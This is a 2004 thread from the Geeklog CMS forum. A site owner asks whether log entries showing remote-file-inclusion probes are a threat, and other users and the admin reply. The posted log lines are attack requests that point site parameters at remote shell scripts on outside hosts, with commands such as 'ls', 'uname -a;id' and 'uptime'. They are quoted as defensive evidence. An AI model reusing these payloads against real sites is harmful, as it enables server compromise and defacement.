The secure CMS.

Welcome to Geeklog, Anonymous Thursday, November 14 2024 @ 05:14 pm EST

Geeklog Forums

Is this a security issue?

 New Topic  Post Reply
 04/24/04 03:43pm (Read 3,250 times)  
Status: offline

arthur

Forum User
Junior
Registered: 10/10/03
Posts: 34
This month I've seen entries like this in my logfiles for shrednow.com:

/article.php?story=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/index.php?topic=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/users.php?mode=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/comment.php?sid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/store.php?item=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/pollbooth.php?qid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/usersettings.php?mode=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=l

/profiles.php?sid=http://spykids.hpgvip.com.br/xpl/cmd.gif?&cmd=ls /

/staticpages/index.php?page=http://s4y.vila.bol.com.br/cse.gif?&cmd=uname -a;id

http://www.shrednow.com/index.php?topic=http://members.lycos.co.uk/b0xz14/db/cat.txt?&cmd=uptime

Do I need to worry about this?
Arthur (http://www.shrednow.com)
 Quote
 04/24/04 04:01pm  
Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 11/06/02
Posts: 523
Now I am not sure about the questions you post in your question above, I will have to leave that to others to address.

I do however think it is inappropriate to show what version you are running in the footer of your site. THen if anyone does know of a vulnerability for the version you are running then they know they can take advantage of it on your site. I remove the version tag from my themes. Thats one small thing you can do to make it tougher on crackers.

Nice site, good to see you finally got the cafepress store going.

Cool
 Quote
 04/24/04 04:12pm  
Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by arthur: Do I need to worry about this?

No.

Someone who doesn't seem to know how Geeklog works is trying out some recipes from a script kiddie's cookbook. Geeklog will either filter these out or, e.g. in case of the topic id, will try to find the URL as a topic in the database - which fails, of course, and produces a friendly error message.

These attacks are probably targeted at some other script or CMS that has a vulnerability in that area.

bye, Dirk
 Quote
 05/09/04 04:15pm  

geoff

Anonymous
it is a security thing. i have, or rather had, a php-nuke website based on a motorcycle event in ireland. i looked at the site yesterday to see that it had been attacked and a story added which said "spykids ownz you".

they can inject the database that runs the webite, add the story and create a new god admin.

a google search will show you some of the websites they have attacked.

i have subsequently changed the site to cpg-nuke which is harder to hack and also shows ip addresses of any attackers.
 Quote
 05/09/04 04:42pm  
Status: offline

Dirk

Site Admin
Admin
Registered: 01/12/02
Posts: 13073
Location:Stuttgart, Germany
Quote by geoff: it is a security thing.

Well, not for Geeklog

bye, Dirk
 Quote
 05/09/04 04:48pm  
Status: offline

ScurvyDawg

Forum User
Full Member
Registered: 11/06/02
Posts: 523
LOL

Fool, you use Nuke.

LMAO
 Quote
 05/09/04 07:04pm  
Status: offline

drshakagee

Forum User
Full Member
Registered: 10/01/03
Posts: 231
Quote by geoff:a google search will show you some of the websites they have attacked.


I did a google search and didn't see any geeklog sites out of the 3700ish on there. Granted I didn't look at all of them, but none of the ones I did look at were using geeklog.
Yes I am mental.
 Quote
 New Topic  Post Reply
All times are EST. The time is now 05:14 pm.
  • Normal Topic
  • Sticky Topic
  • Locked Topic
  • New Post
  • Sticky Topic W/ New Post
  • Locked Topic W/ New Post
  •  View Anonymous Posts
  •  Able to post
  •  Filtered HTML Allowed
  •  Censored Content